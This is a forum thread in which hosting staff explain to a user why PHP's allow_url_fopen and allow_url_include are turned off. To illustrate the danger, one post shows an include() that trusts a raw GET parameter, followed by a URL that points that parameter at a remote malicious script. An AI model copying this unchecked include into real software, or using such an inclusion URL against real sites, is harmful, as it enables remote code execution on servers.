FRIHOSTFORUMSSEARCHFAQTOSBLOGSCOMPETITIONS
You are invited to Log in or Register a free Frihost Account!


help: some function php is off





oufti
hi

i have some problem with a kind of function php

like this error message :

Quote:
Warning: copy() [function.copy]: php_network_getaddresses: getaddrinfo failed: Name or service not known


it's possible to have this function ON ?

and the others: fopen .....
MrBlueSky
allow_url_fopen and allow_url_include are set to 'off', so you can't open, copy or include remote files with copy(), fopen(), etc. This is for security reasons, and there isn't much you can do about it.
oufti
Question

but in this case is my security!
than if i want use this usually function because i think is not dangerous for me, this not possible have this function ON, if i explain why i need this et if i take the risk !!!

i think is not dangerous for other website hosted hier

sorry for my bad english Rolling Eyes
rvec
well it is a huge potential security risk to make it possible to execute external data. If someone wrote a script to have a dynamic page like this:
Code:

if (isset ($_GET['p'])) {
    $section = $_GET['p'];
    include($section .'/index.php');
} else {
    echo 'Which section do you want to see?<br />';
    echo <<<TEXT
<form action="" method="GET">
<option value="news">news</option>
<option value="main">main</option>
<option value="forum">forum</option>
</select>
</form>
TEXT;
}

It will give a select box and will include the news, main or forum index.php file. Problem is, if you can include pages from the outside someone could open this link:
www.you.frih.net/script.php?p=http://example.com/malicious_code.php
That would probably not be very good.
oufti
what's the link:
www.you.frih.net/script.php?p=http://example.com/malicious_code.php
is broken !


arf !!
it's a example Embarassed


but this is not a little bit to paranoïaque...

i'm not worry about the security of site ...
i have nothing to blind
rvec
i know you don't but we'd have to turn it off for everyone. And some users might make mistakes like the above and make it possible for hackers to very easily execute malicious code on our servers.

It's not like we don't trust you, we just have to be careful because some users who just started with php can make big mistakes.
oufti
ah !

i dont know that the hackers can use this function on my site to parasite or attack ours servers ...
for me my site is a part that you can isolate from the other and the server but my aknowlegment is not high about this subject!
i trust you

i have asked this function turn on, on a other hoster and after i do a pm to a administrator, the function is already on for me (only)
is keoconcept
sonam
Quote:
i dont know that the hackers can use this function on my site to parasite or attack ours servers ...
for me my site is a part that you can isolate from the other and the server but my aknowlegment is not high about this subject!


This is quite simple. $_GET gets data from url. If you didn't provide good secure of getting this data some other can include whatever he/she want. You never know what another php script will do trought your page. The allow_url_fopen and allow_url_include is too risky for all users not only for your site. And, on the end, if you need this script you can copy it on frihost server.

Sonam
Agent ME
There should be some way to use a different function to do what you want. If you want to read data or download a file from another webserver, I'm sure there is a function that is built specifically to do that and won't be hampered by the security setting. I might be wrong though - can someone else tell me if I'm right and the name of the function if there is one?
rvec
curl can download data from another server. It just doesn't include it so you can change some stuff before putting it on your page.
oufti
where is my french post ? (i have no times to use english)

is censured and delete ?

WHY ?


(je veux signaler également que j'ai posté en partie francophone pour m'aider à traduire exactement ce qui s'écrivait ici)
MrBlueSky
oufti wrote:
where is my french post ? (i have no times to use english)



Here, I think: http://www.frihost.com/forums/vp-760697.html
rvec
oufti wrote:
where is my french post ? (i have no times to use english)

is censured and delete ?

WHY ?


(je veux signaler également que j'ai posté en partie francophone pour m'aider à traduire exactement ce qui s'écrivait ici)

No i spamcanned it. It's here now: http://www.frihost.com/forums/vt-91252.html (I think it's only visible for staff)
Only english posts allowed in all forums but the language forums.
Related topics
If you need help with php-nuke
need help on php-nuke
Help In Php-nuke
help with php
Need Help in PHP
Need help with php script
help with php needed
HELP on PHP MYSQL : everything MESSED UP
Need help with php
Need help with PHP
Help with php and java script
Need help on PHP programming....
Help with php email
Any one can help 4 PHP object coding self learning site?
Reply to topic    Frihost Forum Index -> Scripting -> Php and MySQL

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.